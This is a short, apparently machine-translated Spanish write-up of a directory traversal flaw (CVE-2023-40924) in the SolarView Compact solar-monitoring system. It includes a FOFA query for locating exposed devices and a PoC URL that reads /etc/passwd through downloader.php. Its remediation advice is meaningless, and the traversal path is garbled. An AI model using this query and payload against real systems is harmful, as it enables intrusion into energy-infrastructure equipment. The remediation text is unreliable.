La vulnerabilidad de cruce de directorio reaparece en el sistema de medición de generación de energía fotovoltaica SolarView Compact de Japón (CVE-2023-40924)

Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo serán responsabilidad del propio usuario. consecuencias incurridas Las consecuencias adversas no tienen nada que ver con el autor del artículo. Este artículo es sólo para fines educativos.

1. Introducción al sistema

Contec es una empresa que se centra en informática integrada personalizada, automatización industrial y tecnologías de comunicación IoT. Contec SolarView Compact es un sistema de aplicaciones de Contec que se puede utilizar para monitoreo remoto del rendimiento, resolución de problemas, optimización del sistema y otras funciones para administrar de forma remota unidades de producción de energía renovable.

2. Descripción de la vulnerabilidad

Los atacantes aprovechan esta vulnerabilidad a través de downloader.php, y el parámetro del archivo se pasa a través del directorio para leer archivos confidenciales.

3. Versiones afectadas

SolarView compacto ＜ 6,00

4. declaración de consulta fofa

cuerpo = “SolarView Compact” && título = “Arriba”

5. Recurrencia de la vulnerabilidad

El navegador presiona Enter directamente

para capturar el paquete BURP.

6.POC&EXP

/downloader.php?file=…/…/…/…/…/…/…/…/etc/passwd%00.jpg

Portal POC de Xiaolong [Actualizado]: Herramienta POC de Xiaolong

7. Sugerencias de reparación

No descargues al azar